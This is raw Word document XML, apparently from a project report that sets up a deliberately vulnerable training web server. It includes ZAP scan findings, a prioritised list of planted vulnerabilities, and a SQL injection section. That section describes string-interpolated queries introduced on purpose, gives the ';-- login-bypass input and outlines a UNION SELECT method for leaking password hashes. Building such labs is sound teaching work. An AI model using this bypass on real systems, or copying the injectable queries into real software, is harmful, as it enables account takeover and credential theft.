          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DF0F627" wp14:editId="3223AC8D">
            <wp:extent cx="5727700" cy="946150"/>
            <wp:effectExtent l="0" t="0" r="6350" b="635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aphical user interface, applicati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946150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B04D6DF" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832"/>
    <w:p w14:paraId="0E61BEDA" w14:textId="77777777" w:rsidR="000602E7" w:rsidRDefault="000602E7" w:rsidP="00306832"/>
    <w:p w14:paraId="6D210613" w14:textId="77777777" w:rsidR="000602E7" w:rsidRDefault="000602E7" w:rsidP="00306832"/>
    <w:p w14:paraId="540B4C7D" w14:textId="77777777" w:rsidR="000602E7" w:rsidRDefault="000602E7" w:rsidP="00306832"/>
    <w:p w14:paraId="2F7CC0D8" w14:textId="77777777" w:rsidR="000602E7" w:rsidRDefault="000602E7" w:rsidP="00306832"/>
    <w:p w14:paraId="508942E6" w14:textId="77777777" w:rsidR="000602E7" w:rsidRDefault="000602E7" w:rsidP="00306832"/>
    <w:p w14:paraId="54AB2701" w14:textId="77777777" w:rsidR="000602E7" w:rsidRDefault="000602E7" w:rsidP="00306832"/>
    <w:p w14:paraId="4CCC121F" w14:textId="77777777" w:rsidR="000602E7" w:rsidRDefault="000602E7" w:rsidP="00306832"/>
    <w:p w14:paraId="08733852" w14:textId="77777777" w:rsidR="000602E7" w:rsidRDefault="000602E7" w:rsidP="00306832"/>
    <w:p w14:paraId="23B3E40F" w14:textId="6A7AEA16" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>From Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4740CC05" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>-To google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDFBAFA" w14:textId="2447EA62" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="602004B1" wp14:editId="49C2F535">
            <wp:extent cx="4959350" cy="1314450"/>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9350" cy="1314450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7114D685" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>-To Pfsense (LAN Interface)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47769404" w14:textId="2B186131" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4760E1ED" wp14:editId="5DF0D27E">
            <wp:extent cx="4610100" cy="112395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0100" cy="1123950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B194648" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>-To Ubuntu web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A9F00F" w14:textId="3EEA3953" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AC822F4" wp14:editId="77488252">
            <wp:extent cx="4660900" cy="1028700"/>
            <wp:effectExtent l="0" t="0" r="635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0900" cy="1028700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="296B0FE5" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>OWASP Zap scan results testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4D909F" w14:textId="43A70462" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AF1CD06" wp14:editId="0E70200A">
            <wp:extent cx="5727700" cy="3028950"/>
            <wp:effectExtent l="0" t="0" r="635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phical user interface, text, application, email&#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7700" cy="3028950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="42ED1E07" w14:textId="77777777" w:rsidR="000602E7" w:rsidRDefault="000602E7" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39B1E1BA" w14:textId="20DFC09D" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OUTCOME:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782D7EB9" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>Based on OWASP Zap testing the website seem to be vulnerable to SQL Injection on the login and registration form, absence of Anti-CSRF token and Anti clickjacking header, the site also uses vulnerable version of JavaScript Library.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBA61D2" w14:textId="33BC7A7A" w:rsidR="00306832" w:rsidRPr="00A40517" w:rsidRDefault="00306832" w:rsidP="00CA3121">
      <w:r>
        <w:t xml:space="preserve">Cross Site Scripting, Log4j, Remote Code Execution are also going to be tested as part of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OWASP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> model.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E206EDC" w14:textId="60E924C1" w:rsidR="00606117" w:rsidRPr="00CA3121" w:rsidRDefault="00641976" w:rsidP="00606117">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00606117" w:rsidRPr="00CA3121">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: WEBSERVER SET-UP AND DEPLOYMENT</w:t>
      </w:r>
      <w:r w:rsidR="00A861C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (VSOC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391E9DF7" w14:textId="77777777" w:rsidR="00606117" w:rsidRPr="00CA3121" w:rsidRDefault="00606117" w:rsidP="00606117">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D49D4A7" w14:textId="2E29972A" w:rsidR="00606117" w:rsidRPr="00CA3121" w:rsidRDefault="00641976" w:rsidP="00606117">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00606117" w:rsidRPr="00CA3121">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: VULNERABILITY INCLUSIONS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C89C847" w14:textId="2BCDB93B" w:rsidR="00384B9F" w:rsidRDefault="00384B9F" w:rsidP="00384B9F">
      <w:r>
        <w:t xml:space="preserve">As agreed with the client R.Ludwiniak on Feb 10th 2022,  Vulnerabilities are prioritized using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MoSCoW</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> framework and comprise: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58848459" w14:textId="0B23122A" w:rsidR="00384B9F" w:rsidRDefault="00384B9F" w:rsidP="00384B9F">
      <w:r>
        <w:tab/>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>SQL Injection (M)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED63EB1" w14:textId="5B7C8FA0" w:rsidR="00384B9F" w:rsidRDefault="00384B9F" w:rsidP="00384B9F">
      <w:r>
        <w:tab/>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>File upload (M)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C300FE0" w14:textId="549EDA12" w:rsidR="00384B9F" w:rsidRDefault="00384B9F" w:rsidP="00384B9F">
      <w:r>
        <w:tab/>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>XSS (M)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADDDCB7" w14:textId="6D20C26C" w:rsidR="00384B9F" w:rsidRDefault="00384B9F" w:rsidP="00384B9F">
      <w:r>
        <w:tab/>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>RFI/LFI (C)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C69383D" w14:textId="1CCF99EE" w:rsidR="00384B9F" w:rsidRDefault="00384B9F" w:rsidP="00384B9F">
      <w:r>
        <w:tab/>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Cryptographic failures of data storage (C)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9F5B3F" w14:textId="6350FA21" w:rsidR="00384B9F" w:rsidRDefault="00384B9F" w:rsidP="00384B9F">
      <w:r>
        <w:tab/>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Misconfigured access control/authentication (S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7C469F" w14:textId="3498A672" w:rsidR="00384B9F" w:rsidRDefault="00384B9F" w:rsidP="00384B9F">
      <w:r>
        <w:tab/>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Outdated/unsecured third party components (C)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AE0739" w14:textId="5F3630D0" w:rsidR="00384B9F" w:rsidRDefault="00384B9F" w:rsidP="00384B9F">
      <w:r>
        <w:tab/>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Server-side request forgery (S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7457D7CA" w14:textId="3CFB8DC1" w:rsidR="00384B9F" w:rsidRDefault="00384B9F" w:rsidP="00384B9F">
      <w:r>
        <w:tab/>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Password/database brute force attack (M)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FE6886" w14:textId="1979F810" w:rsidR="00384B9F" w:rsidRDefault="00384B9F" w:rsidP="00384B9F">
      <w:r>
        <w:tab/>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Reverse shell attacks (M)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B8386E" w14:textId="4295D083" w:rsidR="00606117" w:rsidRDefault="00384B9F" w:rsidP="00384B9F">
      <w:r>
        <w:tab/>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Privilege escalation (M)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1080DBDA" w14:textId="77777777" w:rsidR="00384B9F" w:rsidRDefault="00384B9F" w:rsidP="00384B9F"/>
    <w:p w14:paraId="753A958B" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="003001C2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DD634A4" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="003001C2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="391C26A5" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="003001C2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00DFD478" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="003001C2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B710DBF" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="003001C2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="508C60F6" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="003001C2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F48B3B5" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="003001C2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73BD57A7" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="003001C2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B3799C2" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="003001C2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53E3B301" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="003001C2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="613DD8C3" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="003001C2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63B754A5" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="003001C2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="606F0D96" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="003001C2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2027F9E7" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="003001C2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AEE7DD7" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="003001C2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="112FFAAC" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="003001C2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21907268" w14:textId="7A5E5D58" w:rsidR="003001C2" w:rsidRPr="00CA3121" w:rsidRDefault="003001C2" w:rsidP="003001C2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA3121">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">VULNERABILITY </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA3121">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA3121">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (M)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3384A4BE" w14:textId="6225102A" w:rsidR="00384B9F" w:rsidRDefault="005645A0" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005645A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RESEARCH UNDERTAKEN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AF944C" w14:textId="77777777" w:rsidR="005645A0" w:rsidRDefault="005645A0" w:rsidP="005645A0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The registration form is highly vulnerable and easy to exploit. The inputs from the registration field are included into an SQL query by string interpolation, and the query is executed as a script, allowing multiple commands in a single query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E9F94B" w14:textId="5CFF8B9D" w:rsidR="005645A0" w:rsidRPr="005645A0" w:rsidRDefault="005645A0" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The login form is harder to exploit. While it also uses string interpolation, the query is executed via the ORM (SQLAlchemy) and is thus limited to executing a single SQL expression, which poses greater challenges for data exfiltration. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4DF4BB" w14:textId="7001A481" w:rsidR="005645A0" w:rsidRDefault="005645A0" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005645A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SUGGESTED IMPLEMENTATION METHOD:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A10C94D" w14:textId="02B1D328" w:rsidR="005645A0" w:rsidRDefault="005645A0" w:rsidP="00384B9F">
      <w:r w:rsidRPr="005645A0">
        <w:t>Two forms of SQL injection vulnerability have been introduced into the project. These sit in the `/customer/login` and `/customer/register` endpoints and are of different exploitation difficulties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7EEAF3" w14:textId="77777777" w:rsidR="009B40A5" w:rsidRDefault="009B40A5" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="330" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>On the Login page, you can bypass the password check by entering the email of the account you want to log into followed by the 4 characters `</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> `, which terminate a string, query, and cause the rest of the query to be ignored as a comment. This allows logging into any user account. See Figures 1  &amp; 2 in outcome.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F08461E" w14:textId="77777777" w:rsidR="009B40A5" w:rsidRDefault="009B40A5" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="330" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A more complex query can also leak the users’ password hash, by relying on UNION SELECT and a sort operation to cause the backend to render the wrong field in the welcome flash. This is a more realistic attack than the open SQL script injection on the login page, but requires more complex exploitation and some trial-and-error with queries to determine the database fields. Example SQL injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFE45D2" w14:textId="59B799FF" w:rsidR="005645A0" w:rsidRDefault="009B40A5" w:rsidP="00384B9F">
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="264932CB" wp14:editId="40C8162D">
            <wp:extent cx="5734050" cy="9715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971550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="739BA88C" w14:textId="25EC5405" w:rsidR="009B40A5" w:rsidRDefault="009B40A5" w:rsidP="00384B9F">
      <w:r>
        <w:t>N.B.: This is injected into a query that begins:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737160BF" w14:textId="7D7CA996" w:rsidR="00643C5A" w:rsidRDefault="009B40A5" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="330" w:lineRule="exact"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="CE9178"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>register</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
